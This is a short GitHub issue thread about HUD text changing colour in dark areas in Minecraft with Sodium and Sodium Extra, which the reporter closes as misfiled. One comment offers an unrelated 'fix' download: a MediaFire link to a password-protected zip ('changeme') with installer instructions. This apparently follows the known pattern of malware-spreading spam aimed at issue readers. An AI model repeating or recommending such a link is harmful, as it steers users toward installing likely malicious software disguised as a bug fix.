### ISSUE TITLE
Color of hud text changes when in darker areas

### ISSUE THREAD

**Issue by UninenVille** [FlashyReese/reeses-sodium-options#99]
This didn't happen before and I didn't notice any mention of this in changelog so feels like this is bug, correct me if I'm wrong 😅

Minecraft 1.21.1 with Fabric Loader 0.16.3, only mods loaded are Sodium (mc1.21-0.6.0-beta.1-fabric) and Sodium Extra (mc1.21.1-0.6.0-beta.1+fabric)
![2024-08-29_06 26 51](https://github.com/user-attachments/assets/07b51251-16eb-4446-b28c-1851d3744644)

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by UninenVille** [comment]
Oops, i accidentally reported this to wrong repository, closing. Sorry about that
